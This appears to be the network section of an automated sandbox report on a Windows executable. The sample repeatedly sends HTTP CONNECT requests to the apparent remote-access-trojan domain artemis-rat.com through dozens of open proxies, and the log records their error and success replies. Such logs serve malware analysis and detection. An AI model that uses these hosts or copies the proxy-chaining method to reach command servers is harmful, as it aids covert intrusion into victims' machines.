                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.405226946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.202095032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:00.092756033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            866192.168.2.550103159.223.71.71511873876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.056318998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.092612028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            881192.168.2.55249861.130.9.384433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.114972115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            882192.168.2.552388103.83.232.122803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.115628004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            883192.168.2.55250061.130.9.384433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.115808010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            884192.168.2.55251243.134.164.1754433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.122780085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            885192.168.2.55251343.134.164.1754433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.124351025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            886192.168.2.55251443.134.164.1754433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.126228094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            887192.168.2.552402120.76.42.20988883876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.127859116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.456298113 CET767INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: Beaver
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 635
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            888192.168.2.55251543.134.164.1754433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.128067017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            889192.168.2.552390103.118.44.6180803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.142143965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            890192.168.2.55240158.234.116.19781973876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.197632074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            891192.168.2.55240379.119.155.6380803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.198849916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
892192.168.2.55240431.43.158.10888883876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:41.239964008 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
893192.168.2.55185551.145.176.25080803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:41.242924929 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.544563055 CET | 39 | IN | HTTP/1.1 200 Connection established


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
894192.168.2.552456172.67.181.58803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:41.244400978 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.398916960 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:41 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
895192.168.2.552457104.16.108.149803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:41.244612932 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.398857117 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:41 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
896192.168.2.55240658.234.116.19781933876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:41.247528076 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
897192.168.2.55248645.14.174.148803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:41.284059048 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.438425064 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:41 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
898192.168.2.552414146.19.106.217123343876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:41.284425974 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
899192.168.2.55246554.67.125.4531283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:41.284425974 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.458309889 CET | 116 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Mar 2024 02:30:41 GMT
Server: nginx
Content-Type: text/plain
Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            900192.168.2.55193651.222.241.157272063876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.286364079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.311305046 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:47.423872948 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:53.514415026 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
901192.168.2.550317177.242.201.59993876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:41.287204027 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.544353008 CET | 19 | IN | HTTP/1.1 200 OK


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
902192.168.2.55242438.162.13.2731283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:41.287358999 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.698286057 CET | 111 | IN | HTTP/1.1 407 Proxy Authentication Required
Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
903192.168.2.55251166.225.246.23880803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:41.288119078 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.449884892 CET | 731 | IN | HTTP/1.1 405 Not Allowed
Server: nginx/1.22.1
Date: Mon, 11 Mar 2024 02:30:41 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 559
Connection: keep-alive
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.22.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Mar 11, 2024 03:30:41.892338991 CET | 731 | IN | HTTP/1.1 405 Not Allowed
Server: nginx/1.22.1
Date: Mon, 11 Mar 2024 02:30:41 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 559
Connection: keep-alive
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.22.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
904192.168.2.552407181.12.80.21120003876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:41.288368940 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
905192.168.2.552529104.19.83.128803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:41.292901993 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.447041035 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:41 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
906192.168.2.55023451.158.77.220163793876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:41.294285059 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.405044079 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.501925945 CET | 536 | IN | HTTP/1.0 501 Tor is not an HTTP Proxy
Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            907192.168.2.552524104.17.239.10803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.295588017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.450021029 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            908192.168.2.55244538.162.23.12731283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.299036026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.767234087 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            909192.168.2.55241398.162.25.4316543876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.304168940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            910192.168.2.552448167.172.159.4312583876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.307205915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.995723009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.806385994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
